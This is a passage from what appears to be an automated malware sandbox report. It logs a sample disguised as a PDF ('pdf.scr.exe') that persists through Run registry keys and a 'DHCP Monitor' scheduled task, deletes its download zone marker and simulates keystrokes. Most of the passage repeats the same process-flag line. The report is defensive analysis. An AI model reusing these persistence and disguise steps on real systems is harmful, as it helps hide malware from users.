      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbsJump to behavior
      Uses schtasks.exe or at.exe to add and modify task schedules
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ChromeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ChromeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdateJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdateJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Hides that the sample has been downloaded from the Internet (zone.identifier)
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | delete
      Uses an obfuscated file name to hide its real file extension (double extension)
      Source: Possible double extension: pdf.scrStatic PE information: 026910003102350.pdf.scr.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003A25A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0032FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
